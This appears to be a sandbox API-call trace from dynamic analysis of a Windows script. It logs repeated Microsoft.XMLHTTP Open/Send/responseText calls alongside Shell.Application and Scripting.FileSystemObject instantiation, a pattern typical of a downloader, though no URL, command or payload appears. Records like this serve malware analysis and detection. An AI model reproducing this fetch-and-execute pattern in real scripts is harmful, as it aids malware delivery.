	[0537.964] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0537.964] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0537.964] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0537.964] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0537.964] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0538.285] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0538.285] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0538.288] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0538.288] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0538.288] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0538.288] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0538.288] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0538.288] SysStringLen (param_1=0x0) returned 0x0
	[0538.288] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0538.289] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0538.289] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0538.289] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0538.289] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0538.289] ??2@YAPEAX_K@Z () returned 0x62f350
	[0538.289] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0538.289] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0538.289] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0538.289] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0538.289] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0538.289] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0538.289] SysStringLen (param_1=0x0) returned 0x0
	[0538.289] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0538.292] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0538.292] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0538.292] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0538.292] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0538.292] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0538.292] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0539.885] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0539.885] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0539.885] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0539.886] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0539.886] SysStringLen (param_1=0x0) returned 0x0
	[0539.886] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0539.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0539.887] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0539.887] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0539.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0539.887] ??2@YAPEAX_K@Z () returned 0x62f310
	[0539.887] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0539.887] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0539.887] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0539.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0539.887] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0539.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0539.887] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0539.890] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0539.890] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0539.890] SysStringLen (param_1=0x0) returned 0x0
	[0539.890] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0539.890] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0539.890] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0539.890] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0539.890] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0539.890] ??2@YAPEAX_K@Z () returned 0x62f330
	[0539.890] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0539.891] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0539.891] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0539.891] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0539.891] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0539.891] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0539.891] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0539.891] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0539.891] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0539.891] SysStringLen (param_1=0x0) returned 0x0
	[0539.891] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0539.891] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0539.892] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7c50) returned 0x0
	[0539.892] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0539.892] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0539.892] ??2@YAPEAX_K@Z () returned 0x62f310
	[0539.892] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0539.892] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0539.892] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0539.892] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7c50) returned 0x0
	[0539.892] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7c50) returned 0x3
	[0539.892] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0539.892] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0539.892] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0539.893] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0539.893] SysStringLen (param_1=0x0) returned 0x0
	[0539.893] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0539.893] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0539.893] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0539.893] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0539.893] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0539.893] ??2@YAPEAX_K@Z () returned 0x62f330
	[0539.893] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0539.893] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0539.893] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0539.893] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0539.893] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0539.893] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
